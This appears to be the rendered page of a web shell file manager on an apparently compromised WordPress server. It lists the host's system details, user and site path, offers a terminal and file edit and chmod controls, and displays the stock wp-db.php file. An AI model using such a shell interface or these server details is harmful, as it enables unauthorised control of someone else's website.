🚀 Hostinger Optimized
🖥️ Server: LiteSpeed
💻 System: Linux vds10.bluecorkscrew.com 6.12.0-124.49.1.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 9 00:52:33 EDT 2026 x86_64
👤 User: today (1006)
🐘 PHP: 8.2.33
🚫 Disabled: ✨ NONE

💻 Terminal

📁 /home/today/software4today.us
$

📄 wp-db.php

📁 Path: /home/today/software4today.us/wp-includes/wp-db.php
📊 Size: 445 B
🔒 Perm: 0644
📝 MIME: text/x-php
<?php
/**
 * WordPress database access abstraction class.
 *
 * This file is deprecated, use 'wp-includes/class-wpdb.php' instead.
 *
 * @deprecated 6.1.0
 * @package WordPress
 */

if ( function_exists( '_deprecated_file' ) ) {
	// Note: WPINC may not be defined yet, so 'wp-includes' is used here.
	_deprecated_file( basename( __FILE__ ), '6.1.0', 'wp-includes/class-wpdb.php' );
}

/** wpdb class */
require_once __DIR__ . '/class-wpdb.php';
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨